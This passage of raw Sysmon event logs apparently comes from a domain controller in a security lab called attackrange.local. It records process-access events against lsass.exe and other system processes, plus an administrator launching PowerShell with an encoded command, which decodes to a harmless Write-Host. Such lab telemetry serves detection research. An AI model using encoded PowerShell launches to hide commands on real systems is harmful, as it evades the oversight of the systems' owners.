10341000x80000000000000002237845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D65-603E-89AA-00000000AD01}1410013092C:\Windows\system32\conhost.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.184{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.174{05ADC7E1-6D65-603E-86AA-00000000AD01}8004ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_djkixbzb.jgf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.174{05ADC7E1-6D64-603E-82AA-00000000AD01}13276ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.174{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-89AA-00000000AD01}14100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.171{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.168{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.168{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.164{05ADC7E1-6D65-603E-88AA-00000000AD01}15708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAGMAMQBkADYANQAxAGQANwAtADQAOQBiAGIALQA0ADkAMgBlAC0AOABjADMAOQAtADcAMABmADIAZgBmADcAYgAwAGQAZABkAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_djkixbzb.jgf.ps12021-03-02 16:52:53.153 10341000x80000000000000002237827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002237825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.153{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E32B7878B5A00664BA22A5DB769AFB43,SHA256=ECC8D892C271BD8AB0FA32F5F4D76829AFD41FC5957BA76B442E90AA5062A16D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.137{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.137{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-87AA-00000000AD01}5196C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.137{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.137{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.137{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.122{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-83AA-00000000AD01}14172C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 